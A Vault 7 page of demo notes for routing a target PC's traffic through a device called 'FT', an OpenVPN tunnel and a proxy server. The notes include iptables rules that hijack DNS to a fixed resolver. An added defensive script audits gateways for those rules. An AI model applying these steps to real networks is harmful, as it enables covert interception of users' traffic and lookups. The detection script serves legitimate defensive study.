Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
Proxy Tunnel Demo Notes
Target/Demo network
Setup
1. Add the FT to the Target/Demo network
-option 1a) add a firewall between the FT and the internet.
2. Configure a Target PC to use the FT as its gateway.
3. telnet into the FT
4. remove the default route and replace it with a network entry to get to the proxy server.
route del default gw X.X.X.X
route add -net 5.4.16.0 netmask 255.255.255.0 gw 10.1.1.1
5. On the proxy server:
echo 1 > /proc/sys/net/ipv4/ip_forward
#note: if using port 8080, make sure it is open in your server's fw after setting your IP
# demo: sudo /usr/sbin/openvpn --remote 5.4.16.62 --proto tcp-server \
#   --port 8080 --dev tun --ifconfig 10.129.66.1 10.129.129.1 \
#   --ping 30 --user cbuser --group cbgroup --persist-key --verb 4
#TODO try, useful if using --user and we lost the privileges...
#persist-key, persist-tun, persist-local-ip
# if using --ping include --ping-restart
sudo /usr/sbin/openvpn --remote 5.4.16.62 --proto tcp-server \
  --port 8080 --dev tun --ifconfig 10.129.66.1 10.129.129.1 \
  --route 10.129.129.0 255.255.255.0 10.129.129.1 --user nobody \
  --group nobody --persist-key --persist-tun --persist-local-ip \
  --verb 4
#enable NAT for TUN traffic on the proxy server:
iptables -t nat -A POSTROUTING -s 10.129.0.0/16 -o eth0 -j SNAT \
  --to 5.4.16.104
#enable DNS MASQUERADE to proxy DNS server, e.g. 4.2.2.1
iptables -t nat -I PREROUTING 1 -p udp --dport 53 -j DNAT --to \
  4.2.2.1
#setup virtual net IP for forward pinhole
# this cannot be done until the vpn tunnel is up for good
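
Added example (not part of the original notes): a defender-side audit of a gateway's NAT table for the two rule patterns above, an unscoped DNAT of UDP/53 to a fixed resolver and SNAT of a private source range. The iptables-save sample is constructed, parse_rule and audit_nat are hypothetical helper names, and the private-range test is a heuristic.

```python
import ipaddress
import shlex

# Constructed sample: `iptables-save -t nat` output showing how the two rules
# from the notes would appear, plus one unrelated port-forward for contrast.
SAMPLE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p udp -m udp --dport 53 -j DNAT --to-destination 4.2.2.1
-A PREROUTING -i eth0 -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.10.5:8443
-A POSTROUTING -s 10.129.0.0/16 -o eth0 -j SNAT --to-source 5.4.16.104
COMMIT
"""

def parse_rule(line):
    """Hypothetical helper: '-A CHAIN ...' -> {'chain': ..., flag: value}."""
    tok = shlex.split(line)
    rule, i = {"chain": tok[1]}, 2
    while i < len(tok):
        has_value = i + 1 < len(tok) and not tok[i + 1].startswith(("-", "!"))
        rule[tok[i]] = tok[i + 1] if has_value else True
        i += 2 if has_value else 1
    return rule

def audit_nat(save_text):
    """Return (kind, detail) findings for the NAT patterns in the notes."""
    findings = []
    for line in save_text.splitlines():
        if not line.startswith("-A "):
            continue
        r = parse_rule(line)
        # DNAT of port 53 with no -i/-s/-d scoping rewrites every client's
        # DNS lookups to one fixed resolver.
        if (r["chain"] == "PREROUTING" and r.get("-j") == "DNAT"
                and r.get("--dport") == "53"
                and not any(k in r for k in ("-i", "-s", "-d"))):
            findings.append(("dns-redirect", r.get("--to-destination")))
        # Source NAT of a private range (heuristic: RFC 1918 and similar).
        if (r["chain"] == "POSTROUTING" and r.get("-j") in ("SNAT", "MASQUERADE")
                and isinstance(r.get("-s"), str)):
            if ipaddress.ip_network(r["-s"], strict=False).is_private:
                findings.append(("snat-private-src",
                                 f'{r["-s"]} -> {r.get("--to-source", "masquerade")}'))
    return findings

if __name__ == "__main__":
    for kind, detail in audit_nat(SAMPLE):
        print(kind, detail)
```

iptables-save prints the abbreviated --to from the notes in its long form (--to-destination, --to-source), which is why the audit matches on those names.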